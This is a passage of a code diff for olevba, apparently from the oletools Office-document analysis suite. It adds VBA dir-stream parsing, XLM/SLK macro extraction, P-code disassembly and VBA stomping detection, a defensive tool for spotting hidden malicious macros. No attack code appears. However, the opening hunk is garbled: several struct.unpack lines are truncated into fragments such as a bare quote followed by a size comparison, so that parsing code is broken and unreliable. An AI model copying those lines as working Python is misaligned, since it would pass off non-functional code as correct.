+ def __init__(self, ole, vba_root, project_path, dir_path, relaxed=False):
+ """
+ Extract VBA macros from an OleFileIO object.
+
+ :param vba_root: path to the VBA root storage, containing the VBA storage and the PROJECT stream
+ :param project_path: path to the PROJECT stream
+ :param relaxed: If True, only create info/debug log entry if data is not as expected
+ (e.g. opening substream fails); if False, raise an error in this case
+ """
+ self.ole = ole
+ self.vba_root = vba_root
+ self. project_path = project_path
+ self.dir_path = dir_path
+ self.relaxed = relaxed
+ #: VBA modules contained in the project (list of VBA_Module objects)
+ self.modules = []
+ #: file extension for each VBA module
+ self.module_ext = {}
+ log.debug('Parsing the dir stream from %r' % dir_path)
+ # read data from dir stream (compressed)
+ dir_compressed = ole.openstream(dir_path).read()
+ # decompress it:
+ dir_stream = BytesIO(decompress_stream(bytearray(dir_compressed)))
+ # store reference for later use:
+ self.dir_stream = dir_stream
+
+ # reference: MS-VBAL 2.3.4.2 dir Stream: Version Independent Project Information
+
+ # PROJECTSYSKIND Record
+ # Specifies the platform for which the VBA project is created.
+ projectsyskind_id = struct.unpack(" 128:
+ # TODO: raise an actual error? What is MS Office's behaviour?
+ log.error("PROJECTNAME_SizeOfProjectName value not in range [1-128]: {0}".format(sizeof_projectname))
+ projectname_bytes = dir_stream.read(sizeof_projectname)
+ self.projectname = self.decode_bytes(projectname_bytes)
+
+
+ # PROJECTDOCSTRING Record
+ # Specifies the description for the VBA project.
+ projectdocstring_id = struct.unpack(" 2000:
+ log.error(
+ "PROJECTDOCSTRING_SizeOfDocString value not in range: {0}".format(projectdocstring_sizeof_docstring))
+ # DocString (variable): An array of SizeOfDocString bytes that specifies the description for the VBA project.
+ # MUST contain MBCS characters encoded using the code page specified in PROJECTCODEPAGE (section 2.3.4.2.1.4).
+ # MUST NOT contain null characters.
+ docstring_bytes = dir_stream.read(projectdocstring_sizeof_docstring)
+ self.docstring = self.decode_bytes(docstring_bytes)
+ projectdocstring_reserved = struct.unpack(" 260:
+ log.error(
+ "PROJECTHELPFILEPATH_SizeOfHelpFile1 value not in range: {0}".format(projecthelpfilepath_sizeof_helpfile1))
+ projecthelpfilepath_helpfile1 = dir_stream.read(projecthelpfilepath_sizeof_helpfile1)
+ projecthelpfilepath_reserved = struct.unpack(" 1015:
+ log.error(
+ "PROJECTCONSTANTS_SizeOfConstants value not in range: {0}".format(projectconstants_sizeof_constants))
+ projectconstants_constants = dir_stream.read(projectconstants_sizeof_constants)
+ projectconstants_reserved = struct.unpack(" -1:
stripped_data = stripped_data[content_offset:]
# TODO: quick and dirty fix: insert a standard line with MIME-Version header?
- mhtml = email.message_from_string(stripped_data)
+ # monkeypatch email to fix issue #32:
+ # allow header lines without ":"
+ oldHeaderRE = copy(email.feedparser.headerRE)
+ loosyHeaderRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
+ email.feedparser.headerRE = loosyHeaderRE
+ if PYTHON2:
+ mhtml = email.message_from_string(stripped_data)
+ else:
+ # on Python 3, need to use message_from_bytes instead:
+ mhtml = email.message_from_bytes(stripped_data)
+ email.feedparser.headerRE = oldHeaderRE
# find all the attached files:
for part in mhtml.walk():
content_type = part.get_content_type() # always returns a value
@@ -2505,7 +2966,7 @@ def open_mht(self, data):
# using the ActiveMime/MSO format (zlib-compressed), and Base64 encoded.
# decompress the zlib data starting at offset 0x32, which is the OLE container:
# check ActiveMime header:
- if isinstance(part_data, str) and is_mso_file(part_data):
+ if isinstance(part_data, bytes) and is_mso_file(part_data):
log.debug('Found ActiveMime header, decompressing MSO container')
try:
ole_data = mso_file_extract(part_data)
@@ -2567,6 +3028,40 @@ def open_ppt(self):
log.debug("File appears not to be a ppt file (%s)" % exc)
+ def open_slk(self, data):
+ """
+ Open a SLK file, which may contain XLM/Excel 4 macros
+ :param data: file contents in a bytes string
+ :return: nothing
+ """
+ # TODO: Those results should be stored as XLM macros, not VBA
+ log.info('Opening SLK file %s' % self.filename)
+ xlm_macro_found = False
+ xlm_macros = []
+ xlm_macros.append('Formulas and XLM/Excel 4 macros extracted from SLK file:')
+ for line in data.splitlines(keepends=False):
+ if line.startswith(b'O'):
+ # Option: "O;E" indicates a macro sheet, must appear before NN and C rows
+ for s in line.split(b';'):
+ if s.startswith(b'E'):
+ xlm_macro_found = True
+ log.debug('SLK parser: found macro sheet')
+ elif line.startswith(b'NN') and xlm_macro_found:
+ # Name that can trigger a macro, for example "Auto_Open"
+ for s in line.split(b';'):
+ if s.startswith(b'N') and s.strip() != b'NN':
+ xlm_macros.append('Named cell: %s' % bytes2str(s[1:]))
+ elif line.startswith(b'C') and xlm_macro_found:
+ # Cell
+ for s in line.split(b';'):
+ if s.startswith(b'E'):
+ xlm_macros.append('Formula or Macro: %s' % bytes2str(s[1:]))
+ if xlm_macro_found:
+ self.contains_macros = True
+ self.xlm_macros = xlm_macros
+ self.type = TYPE_SLK
+
+
def open_text(self, data):
"""
Open a text file containing VBA or VBScript source code
@@ -2575,7 +3070,9 @@ def open_text(self, data):
"""
log.info('Opening text file %s' % self.filename)
# directly store the source code:
- self.vba_code_all_modules = data
+ # On Python 2, store it as a raw bytes string
+ # On Python 3, convert it to unicode assuming it was encoded with UTF-8
+ self.vba_code_all_modules = bytes2str(data)
self.contains_macros = True
# set type only if parsing succeeds
self.type = TYPE_TEXT
@@ -2698,6 +3195,7 @@ def detect_vba_macros(self):
# if OpenXML/PPT, check all the OLE subfiles:
if self.ole_file is None:
for ole_subfile in self.ole_subfiles:
+ ole_subfile.no_xlm = self.no_xlm
if ole_subfile.detect_vba_macros():
self.contains_macros = True
return True
@@ -2731,7 +3229,7 @@ def detect_vba_macros(self):
log.debug('%r...[much more data]...%r' % (data[:100], data[-50:]))
else:
log.debug(repr(data))
- if 'Attribut' in data:
+ if b'Attribut\x00' in data:
log.debug('Found VBA compressed code')
self.contains_macros = True
except IOError as exc:
@@ -2740,8 +3238,59 @@ def detect_vba_macros(self):
log.debug('Trace:', exc_trace=True)
else:
raise SubstreamOpenError(self.filename, d.name, exc)
+ if (not self.no_xlm) and self.detect_xlm_macros():
+ self.contains_macros = True
return self.contains_macros
+ def detect_xlm_macros(self):
+ # if this is a SLK file, the analysis was done in open_slk:
+ if self.type == TYPE_SLK:
+ return self.contains_macros
+ from oletools.thirdparty.oledump.plugin_biff import cBIFF
+ self.xlm_macros = []
+ if self.ole_file is None:
+ return False
+ for excel_stream in ('Workbook', 'Book'):
+ if self.ole_file.exists(excel_stream):
+ log.debug('Found Excel stream %r' % excel_stream)
+ data = self.ole_file.openstream(excel_stream).read()
+ log.debug('Running BIFF plugin from oledump')
+ try:
+ # starting from plugin_biff 0.0.12, we use the CSV output (-c) instead of -x
+ # biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-x')
+ # First let's get the list of boundsheets, and check if there are Excel 4 macros:
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o BOUNDSHEET')
+ self.xlm_macros = biff_plugin.Analyze()
+ if "Excel 4.0 macro sheet" in '\n'.join(self.xlm_macros):
+ log.debug('Found XLM macros')
+ # get the list of labels, which may contain the "Auto_Open" trigger
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o LABEL -r LN')
+ self.xlm_macros += biff_plugin.Analyze()
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-c -r LN')
+ self.xlm_macros += biff_plugin.Analyze()
+ # we run plugin_biff again, this time to search DCONN objects and get their URLs, if any:
+ # ref: https://inquest.net/blog/2020/03/18/Getting-Sneakier-Hidden-Sheets-Data-Connections-and-XLM-Macros
+ biff_plugin = cBIFF(name=[excel_stream], stream=data, options='-o DCONN -s')
+ self.xlm_macros += biff_plugin.Analyze()
+ return True
+ except:
+ log.exception('Error when running oledump.plugin_biff, please report to %s' % URL_OLEVBA_ISSUES)
+ return False
+
+
+ def encode_string(self, unicode_str):
+ """
+ Encode a unicode string to bytes or str, using the specified encoding
+ for the VBA_parser. By default, it will be bytes/UTF-8 on Python 2, and
+ a normal unicode string on Python 3.
+ :param str unicode_str: string to be encoded
+ :return: encoded string
+ """
+ if self.encoding is None:
+ return unicode_str
+ else:
+ return unicode_str.encode(self.encoding, errors='replace')
+
def extract_macros(self):
"""
Extract and decompress source code for each VBA macro found in the file
@@ -2758,6 +3307,12 @@ def extract_macros(self):
if self.type == TYPE_TEXT:
# This is a text file, yield the full code:
yield (self.filename, '', self.filename, self.vba_code_all_modules)
+ elif self.type == TYPE_SLK:
+ if self.xlm_macros:
+ vba_code = ''
+ for line in self.xlm_macros:
+ vba_code += "' " + line + '\n'
+ yield ('xlm_macro', 'xlm_macro', 'xlm_macro.txt', vba_code)
else:
# OpenXML/PPT: recursively yield results from each OLE subfile:
for ole_subfile in self.ole_subfiles:
@@ -2798,18 +3353,33 @@ def extract_macros(self):
# read data
log.debug('Reading data from stream %r' % d.name)
data = ole._open(d.isectStart, d.size).read()
- for match in re.finditer(r'\x00Attribut[^e]', data, flags=re.IGNORECASE):
+ for match in re.finditer(b'\\x00Attribut[^e]', data, flags=re.IGNORECASE):
start = match.start() - 3
log.debug('Found VBA compressed code at index %X' % start)
compressed_code = data[start:]
try:
- vba_code = decompress_stream(compressed_code)
+ vba_code = decompress_stream(bytearray(compressed_code))
+ # TODO vba_code = self.encode_string(vba_code)
yield (self.filename, d.name, d.name, vba_code)
except Exception as exc:
# display the exception with full stack trace for debugging
log.debug('Error processing stream %r in file %r (%s)' % (d.name, self.filename, exc))
log.debug('Traceback:', exc_info=True)
# do not raise the error, as it is unlikely to be a compressed macro stream
+ if self.xlm_macros:
+ vba_code = ''
+ for line in self.xlm_macros:
+ vba_code += "' " + line + '\n'
+ yield ('xlm_macro', 'xlm_macro', 'xlm_macro.txt', vba_code)
+ # Analyse the VBA P-code to detect VBA stomping:
+ # If stomping is detected, add a fake VBA module with the P-code as source comments
+ # so that VBA_Scanner can find keywords and IOCs in it
+ if self.detect_vba_stomping():
+ vba_code = ''
+ for line in self.pcodedmp_output.splitlines():
+ vba_code += "' " + line + '\n'
+ yield ('VBA P-code', 'VBA P-code', 'VBA_P-code.txt', vba_code)
+
def extract_all_macros(self):
"""
@@ -2831,6 +3401,8 @@ def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
"""
runs extract_macros and analyze the source code of all VBA macros
found in the file.
+ All results are stored in self.analysis_results.
+ If called more than once, simply returns the previous results.
"""
if self.detect_vba_macros():
# if the analysis was already done, avoid doing it twice:
@@ -2847,6 +3419,13 @@ def analyze_macros(self, show_decoded_strings=False, deobfuscate=False):
# Analyze the whole code at once:
scanner = VBA_Scanner(self.vba_code_all_modules)
self.analysis_results = scanner.scan(show_decoded_strings, deobfuscate)
+ if self.detect_vba_stomping():
+ log.debug('adding VBA stomping to suspicious keywords')
+ keyword = 'VBA Stomping'
+ description = 'VBA Stomping was detected: the VBA source code and P-code are different, '\
+ 'this may have been used to hide malicious code'
+ scanner.suspicious_keywords.append((keyword, description))
+ scanner.results.append(('Suspicious', keyword, description))
autoexec, suspicious, iocs, hexstrings, base64strings, dridex, vbastrings = scanner.scan_summary()
self.nb_autoexec += autoexec
self.nb_suspicious += suspicious
@@ -2958,11 +3537,12 @@ def extract_form_strings(self):
"""
Extract printable strings from each VBA Form found in the file
- Iterator: yields (filename, stream_path, vba_filename, vba_code) for each VBA macro found
+ Iterator: yields (filename, stream_path, form_string) for each printable string found in forms
If the file is OLE, filename is the path of the file.
If the file is OpenXML, filename is the path of the OLE subfile containing VBA macros
within the zip archive, e.g. word/vbaProject.bin.
If the file is PPT, result is as for OpenXML but filename is useless
+ Note: form_string is a raw bytes string on Python 2, a unicode str on Python 3
"""
if self.ole_file is None:
# This may be either an OpenXML/PPT or a text file:
@@ -2985,8 +3565,186 @@ def extract_form_strings(self):
# Extract printable strings from the form object stream "o":
for m in re_printable_string.finditer(form_data):
log.debug('Printable string found in form: %r' % m.group())
- yield (self.filename, '/'.join(o_stream), m.group())
+ # On Python 3, convert bytes string to unicode str:
+ if PYTHON2:
+ found_str = m.group()
+ else:
+ found_str = m.group().decode('utf8', errors='replace')
+ if found_str != 'Tahoma':
+ yield (self.filename, '/'.join(o_stream), found_str)
+
+ def extract_form_strings_extended(self):
+ if self.ole_file is None:
+ # This may be either an OpenXML/PPT or a text file:
+ if self.type == TYPE_TEXT:
+ # This is a text file, return no results:
+ return
+ else:
+ # OpenXML/PPT: recursively yield results from each OLE subfile:
+ for ole_subfile in self.ole_subfiles:
+ for results in ole_subfile.extract_form_strings_extended():
+ yield results
+ else:
+ # This is an OLE file:
+ self.find_vba_forms()
+ ole = self.ole_file
+ for form_storage in self.vba_forms:
+ for variable in oleform.extract_OleFormVariables(ole, form_storage):
+ yield (self.filename, '/'.join(form_storage), variable)
+ def extract_pcode(self):
+ """
+ Extract and disassemble the VBA P-code, using pcodedmp
+
+ :return: VBA P-code disassembly
+ :rtype: str
+ """
+ # Text and SLK files cannot be stomped:
+ if self.type in (TYPE_SLK, TYPE_TEXT):
+ self.pcodedmp_output = ''
+ return ''
+ # only run it once:
+ if self.pcodedmp_output is None:
+ log.debug('Calling pcodedmp to extract and disassemble the VBA P-code')
+ # import pcodedmp here to avoid circular imports:
+ try:
+ from pcodedmp import pcodedmp
+ except Exception as e:
+ # This may happen with Pypy, because pcodedmp imports win_unicode_console...
+ # TODO: this is a workaround, we just ignore P-code
+ # TODO: here we just use log.info, because the word "error" in the output makes some of the tests fail...
+ log.info('Exception when importing pcodedmp: {}'.format(e))
+ self.pcodedmp_output = ''
+ return ''
+ # logging is disabled after importing pcodedmp, need to re-enable it
+ # This is because pcodedmp imports olevba again :-/
+ # TODO: here it works only if logging was enabled, need to change pcodedmp!
+ enable_logging()
+ # pcodedmp prints all its output to sys.stdout, so we need to capture it so that
+ # we can process the results later on.
+ # save sys.stdout, then modify it to capture pcodedmp's output:
+ # stdout = sys.stdout
+ if PYTHON2:
+ # on Python 2, console output is bytes
+ output = BytesIO()
+ else:
+ # on Python 3, console output is unicode
+ output = StringIO()
+ # sys.stdout = output
+ # we need to fake an argparser for those two args used by pcodedmp:
+ class args:
+ disasmOnly = True
+ verbose = False
+ try:
+ # TODO: handle files in memory too
+ log.debug('before pcodedmp')
+ # TODO: we just ignore pcodedmp errors
+ stderr = sys.stderr
+ sys.stderr = output
+ pcodedmp.processFile(self.filename, args, output_file=output)
+ sys.stderr = stderr
+ log.debug('after pcodedmp')
+ except Exception as e:
+ # print('Error while running pcodedmp: {}'.format(e), file=sys.stderr, flush=True)
+ # set sys.stdout back to its original value
+ # sys.stdout = stdout
+ log.exception('Error while running pcodedmp')
+ # finally:
+ # # set sys.stdout back to its original value
+ # sys.stdout = stdout
+ self.pcodedmp_output = output.getvalue()
+ # print(self.pcodedmp_output)
+ # log.debug(self.pcodedmp_output)
+ return self.pcodedmp_output
+
+ def detect_vba_stomping(self):
+ """
+ Detect VBA stomping, by comparing the keywords present in the P-code and
+ in the VBA source code.
+
+ :return: True if VBA stomping detected, False otherwise
+ :rtype: bool
+ """
+ log.debug('detect_vba_stomping')
+ # only run it once:
+ if self.vba_stomping_detected is not None:
+ return self.vba_stomping_detected
+ # Text and SLK files cannot be stomped:
+ if self.type in (TYPE_SLK, TYPE_TEXT):
+ self.vba_stomping_detected = False
+ return False
+ # TODO: Files in memory cannot be analysed with pcodedmp yet
+ if not self.file_on_disk:
+ log.warning('For now, VBA stomping cannot be detected for files in memory')
+ self.vba_stomping_detected = False
+ return False
+ # only run it once:
+ if self.vba_stomping_detected is None:
+ log.debug('Analysing the P-code to detect VBA stomping')
+ self.extract_pcode()
+ # print('pcodedmp OK')
+ log.debug('pcodedmp OK')
+ # process the output to extract keywords, to detect VBA stomping
+ keywords = set()
+ for line in self.pcodedmp_output.splitlines():
+ if line.startswith('\t'):
+ log.debug('P-code: ' + line.strip())
+ tokens = line.split(None, 1)
+ mnemonic = tokens[0]
+ args = ''
+ if len(tokens) == 2:
+ args = tokens[1].strip()
+ # log.debug(repr([mnemonic, args]))
+ # if mnemonic in ('VarDefn',):
+ # # just add the rest of the line
+ # keywords.add(args)
+ # if mnemonic == 'FuncDefn':
+ # # function definition: just strip parentheses
+ # funcdefn = args.strip('()')
+ # keywords.add(funcdefn)
+ if mnemonic in ('ArgsCall', 'ArgsLd', 'St', 'Ld', 'MemSt', 'Label'):
+ # sometimes ArgsCall is followed by "(Call)", if so we remove it (issue #489)
+ if args.startswith('(Call) '):
+ args = args[7:]
+ # add 1st argument:
+ name = args.split(None, 1)[0]
+ # sometimes pcodedmp reports names like "id_FFFF", which are not
+ # directly present in the VBA source code
+ # (for example "Me" in VBA appears as id_FFFF in P-code)
+ if not name.startswith('id_'):
+ keywords.add(name)
+ if mnemonic == 'LitStr':
+ # re_string = re.compile(r'\"([^\"]|\"\")*\"')
+ # for match in re_string.finditer(line):
+ # print('\t' + match.group())
+ # the string is the 2nd argument:
+ s = args.split(None, 1)[1]
+ # tricky issue: when a string contains double quotes inside,
+ # pcodedmp returns a single ", whereas in the VBA source code
+ # it is always a double "".
+ # We have to remove the " around the strings, then double the remaining ",
+ # and put back the " around:
+ if len(s)>=2:
+ assert(s[0]=='"' and s[-1]=='"')
+ s = s[1:-1]
+ s = s.replace('"', '""')
+ s = '"' + s + '"'
+ keywords.add(s)
+ log.debug('Keywords extracted from P-code: ' + repr(sorted(keywords)))
+ self.vba_stomping_detected = False
+ # TODO: add a method to get all VBA code as one string
+ vba_code_all_modules = ''
+ for (_, _, _, vba_code) in self.extract_all_macros():
+ vba_code_all_modules += vba_code + '\n'
+ for keyword in keywords:
+ if keyword not in vba_code_all_modules:
+ log.debug('Keyword {!r} not found in VBA code'.format(keyword))
+ log.debug('VBA STOMPING DETECTED!')
+ self.vba_stomping_detected = True
+ break
+ if not self.vba_stomping_detected:
+ log.debug('No VBA stomping detected.')
+ return self.vba_stomping_detected
def close(self):
"""
@@ -3016,11 +3774,11 @@ def __init__(self, *args, **kwargs):
super(VBA_Parser_CLI, self).__init__(*args, **kwargs)
- def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
+ def run_analysis(self, show_decoded_strings=False, deobfuscate=False):
"""
- Analyze the provided VBA code, and print the results in a table
+ Analyze the provided VBA code, without printing the results (yet)
+ All results are stored in self.analysis_results.
- :param vba_code: str, VBA source code to be analyzed
:param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
:param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
:return: None
@@ -3029,21 +3787,37 @@ def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
if sys.stdout.isatty():
print('Analysis...\r', end='')
sys.stdout.flush()
- results = self.analyze_macros(show_decoded_strings, deobfuscate)
+ self.analyze_macros(show_decoded_strings, deobfuscate)
+
+
+ def print_analysis(self, show_decoded_strings=False, deobfuscate=False):
+ """
+ print the analysis results in a table
+
+ :param show_decoded_strings: bool, if True hex-encoded strings will be displayed with their decoded content.
+ :param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
+ :return: None
+ """
+ results = self.analysis_results
if results:
- t = prettytable.PrettyTable(('Type', 'Keyword', 'Description'))
- t.align = 'l'
- t.max_width['Type'] = 10
- t.max_width['Keyword'] = 20
- t.max_width['Description'] = 39
+ t = tablestream.TableStream(column_width=(10, 20, 45),
+ header_row=('Type', 'Keyword', 'Description'))
+ COLOR_TYPE = {
+ 'AutoExec': 'yellow',
+ 'Suspicious': 'red',
+ 'IOC': 'cyan',
+ }
for kw_type, keyword, description in results:
# handle non printable strings:
if not is_printable(keyword):
keyword = repr(keyword)
if not is_printable(description):
description = repr(description)
- t.add_row((kw_type, keyword, description))
- print(t)
+ color_type = COLOR_TYPE.get(kw_type, None)
+ t.write_row((kw_type, keyword, description), colors=(color_type, None, None))
+ t.close()
+ if self.vba_stomping_detected:
+ print('VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues')
else:
print('No suspicious keyword or IOC found.')
@@ -3064,10 +3838,29 @@ def print_analysis_json(self, show_decoded_strings=False, deobfuscate=False):
return [dict(type=kw_type, keyword=keyword, description=description)
for kw_type, keyword, description in self.analyze_macros(show_decoded_strings, deobfuscate)]
+ def colorize_keywords(self, vba_code):
+ """
+ Colorize keywords found during the VBA code analysis
+ :param vba_code: str, VBA code to be colorized
+ :return: str, VBA code including color tags for Colorclass
+ """
+ results = self.analysis_results
+ if results:
+ COLOR_TYPE = {
+ 'AutoExec': 'yellow',
+ 'Suspicious': 'red',
+ 'IOC': 'cyan',
+ }
+ for kw_type, keyword, description in results:
+ color_type = COLOR_TYPE.get(kw_type, None)
+ if color_type:
+ vba_code = vba_code.replace(keyword, '{auto%s}%s{/%s}' % (color_type, keyword, color_type))
+ return vba_code
+
def process_file(self, show_decoded_strings=False,
display_code=True, hide_attributes=True,
vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
+ deobfuscate=False, pcode=False, no_xlm=False):
"""
Process a single file
@@ -3079,9 +3872,12 @@ def process_file(self, show_decoded_strings=False,
otherwise each module is analyzed separately (old behaviour)
:param hide_attributes: bool, if True the first lines starting with "Attribute VB" are hidden (default)
:param deobfuscate: bool, if True attempt to deobfuscate VBA expressions (slow)
+ :param pcode bool: if True, call pcodedmp to disassemble P-code and display it
+ :param no_xlm bool: if True, don't use the BIFF plugin to extract old style XLM macros
"""
#TODO: replace print by writing to a provided output file (sys.stdout by default)
# fix conflicting parameters:
+ self.no_xlm = no_xlm
if vba_code_only and not display_code:
display_code = True
if self.container:
@@ -3094,6 +3890,8 @@ def process_file(self, show_decoded_strings=False,
#TODO: handle olefile errors, when an OLE file is malformed
print('Type: %s'% self.type)
if self.detect_vba_macros():
+ # run analysis before displaying VBA code, in order to colorize found keywords
+ self.run_analysis(show_decoded_strings=show_decoded_strings, deobfuscate=deobfuscate)
#print 'Contains VBA Macros:'
for (subfilename, stream_path, vba_filename, vba_code) in self.extract_all_macros():
if hide_attributes:
@@ -3110,12 +3908,60 @@ def process_file(self, show_decoded_strings=False,
if vba_code_filtered.strip() == '':
print('(empty macro)')
else:
+ # check if the VBA code contains special characters such as backspace (issue #358)
+ if '\x08' in vba_code_filtered:
+ log.warning('The VBA code contains special characters such as backspace, that may be used for obfuscation.')
+ if sys.stdout.isatty():
+ # if the standard output is the console, we'll display colors
+ backspace = colorclass.Color(b'{autored}\\x08{/red}')
+ else:
+ backspace = '\\x08'
+ # replace backspace by "\x08" for display
+ vba_code_filtered = vba_code_filtered.replace('\x08', backspace)
+ try:
+ # Colorize the interesting keywords in the output:
+ # (unless the output is redirected to a file)
+ if sys.stdout.isatty():
+ vba_code_filtered = colorclass.Color(self.colorize_keywords(vba_code_filtered))
+ except UnicodeError:
+ # TODO better handling of Unicode
+ log.error('Unicode conversion to be fixed before colorizing the output')
print(vba_code_filtered)
for (subfilename, stream_path, form_string) in self.extract_form_strings():
+ if form_string is not None:
+ print('-' * 79)
+ print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
+ print('- ' * 39)
+ print(form_string)
+ try:
+ for (subfilename, stream_path, form_variables) in self.extract_form_strings_extended():
+ if form_variables is not None:
+ print('-' * 79)
+ print('VBA FORM Variable "%s" IN %r - OLE stream: %r' % (form_variables['name'], subfilename, stream_path))
+ print('- ' * 39)
+ print(str(form_variables['value']))
+ except Exception as exc:
+ # display the exception with full stack trace for debugging
+ log.info('Error parsing form: %s' % exc)
+ log.debug('Traceback:', exc_info=True)
+ if pcode:
print('-' * 79)
- print('VBA FORM STRING IN %r - OLE stream: %r' % (subfilename, stream_path))
- print('- ' * 39)
- print(form_string)
+ print('P-CODE disassembly:')
+ pcode = self.extract_pcode()
+ print(pcode)
+ # if self.type == TYPE_SLK:
+ # # TODO: clean up this code
+ # slk_output = self.vba_code_all_modules
+ # try:
+ # # Colorize the interesting keywords in the output:
+ # # (unless the output is redirected to a file)
+ # if sys.stdout.isatty():
+ # slk_output = colorclass.Color(self.colorize_keywords(slk_output))
+ # except UnicodeError:
+ # # TODO better handling of Unicode
+ # log.debug('Unicode conversion to be fixed before colorizing the output')
+ # print(slk_output)
+
if not vba_code_only:
# analyse the code from all modules at once:
self.print_analysis(show_decoded_strings, deobfuscate)
@@ -3129,6 +3975,7 @@ def process_file(self, show_decoded_strings=False,
except Exception as exc:
# display the exception with full stack trace for debugging
log.info('Error processing file %s (%s)' % (self.filename, exc))
+ traceback.print_exc()
log.debug('Traceback:', exc_info=True)
raise ProcessingError(self.filename, exc)
print('')
@@ -3137,7 +3984,7 @@ def process_file(self, show_decoded_strings=False,
def process_file_json(self, show_decoded_strings=False,
display_code=True, hide_attributes=True,
vba_code_only=False, show_deobfuscated_code=False,
- deobfuscate=False):
+ deobfuscate=False, no_xlm=False):
"""
Process a single file
@@ -3154,6 +4001,7 @@ def process_file_json(self, show_decoded_strings=False,
"""
#TODO: fix conflicting parameters (?)
+ self.no_xlm = no_xlm
if vba_code_only and not display_code:
display_code = True
@@ -3207,7 +4055,7 @@ def process_file_json(self, show_decoded_strings=False,
return result
- def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
+ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False, no_xlm=False):
"""
Process a file in triage mode, showing only summary results on one line.
"""
@@ -3236,16 +4084,6 @@ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
line = '%-12s %s' % (flags, self.filename)
print(line)
-
- # old table display:
- # macros = autoexec = suspicious = iocs = hexstrings = 'no'
- # if nb_macros: macros = 'YES:%d' % nb_macros
- # if nb_autoexec: autoexec = 'YES:%d' % nb_autoexec
- # if nb_suspicious: suspicious = 'YES:%d' % nb_suspicious
- # if nb_iocs: iocs = 'YES:%d' % nb_iocs
- # if nb_hexstrings: hexstrings = 'YES:%d' % nb_hexstrings
- # # 2nd line = info
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % (self.type, macros, autoexec, suspicious, iocs, hexstrings)
except Exception as exc:
# display the exception with full stack trace for debugging only
log.debug('Error processing file %s (%s)' % (self.filename, exc),
@@ -3253,26 +4091,11 @@ def process_file_triage(self, show_decoded_strings=False, deobfuscate=False):
raise ProcessingError(self.filename, exc)
- # t = prettytable.PrettyTable(('filename', 'type', 'macros', 'autoexec', 'suspicious', 'ioc', 'hexstrings'),
- # header=False, border=False)
- # t.align = 'l'
- # t.max_width['filename'] = 30
- # t.max_width['type'] = 10
- # t.max_width['macros'] = 6
- # t.max_width['autoexec'] = 6
- # t.max_width['suspicious'] = 6
- # t.max_width['ioc'] = 6
- # t.max_width['hexstrings'] = 6
- # t.add_row((filename, ftype, macros, autoexec, suspicious, iocs, hexstrings))
- # print t
-
-
#=== MAIN =====================================================================
-def main():
- """
- Main function, called when olevba is run from the command line
- """
+def parse_args(cmd_line_args=None):
+ """ parse command line arguments (given ones or per default sys.argv) """
+
DEFAULT_LOG_LEVEL = "warning" # Default log level
LOG_LEVELS = {
'debug': logging.DEBUG,
@@ -3291,7 +4114,11 @@ def main():
parser.add_option("-r", action="store_true", dest="recursive",
help='find files recursively in subdirectories.')
parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
+ help='if the file is a zip archive, open all files from it, using the provided password.')
+ parser.add_option("-p", "--password", type='str', action='append',
+ default=[],
+ help='if encrypted office files are encountered, try '
+ 'decryption with this password. May be repeated.')
parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
# output mode; could make this even simpler with add_option(type='choice') but that would make
@@ -3323,69 +4150,205 @@ def main():
help="Attempt to deobfuscate VBA expressions (slow)")
parser.add_option('--relaxed', dest="relaxed", action="store_true", default=False,
help="Do not raise errors if opening of substream fails")
+ parser.add_option('--pcode', dest="pcode", action="store_true", default=False,
+ help="Disassemble and display the P-code (using pcodedmp)")
+ parser.add_option('--no-xlm', dest="no_xlm", action="store_true", default=False,
+ help="Do not extract XLM Excel macros. This may speed up analysis of large files.")
- (options, args) = parser.parse_args()
+ (options, args) = parser.parse_args(cmd_line_args)
# Print help if no arguments are passed
if len(args) == 0:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
+ # print banner with version
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print('olevba %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
print(__doc__)
parser.print_help()
sys.exit(RETURN_WRONG_ARGS)
+ options.loglevel = LOG_LEVELS[options.loglevel]
+
+ return options, args
+
+
+def process_file(filename, data, container, options, crypto_nesting=0):
+ """
+ Part of main function that processes a single file.
+
+ This handles exceptions and encryption.
+
+ Returns a single code summarizing the status of processing of this file
+ """
+ try:
+ # Open the file
+ vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
+ relaxed=options.relaxed)
+
+ if options.output_mode == 'detailed':
+ # fully detailed output
+ vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
+ display_code=options.display_code,
+ hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
+ show_deobfuscated_code=options.show_deobfuscated_code,
+ deobfuscate=options.deobfuscate, pcode=options.pcode, no_xlm=options.no_xlm)
+ elif options.output_mode == 'triage':
+ # summarized output for triage:
+ vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
+ deobfuscate=options.deobfuscate, no_xlm=options.no_xlm)
+ elif options.output_mode == 'json':
+ print_json(
+ vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
+ display_code=options.display_code,
+ hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
+ show_deobfuscated_code=options.show_deobfuscated_code,
+ deobfuscate=options.deobfuscate, no_xlm=options.no_xlm))
+ else: # (should be impossible)
+ raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
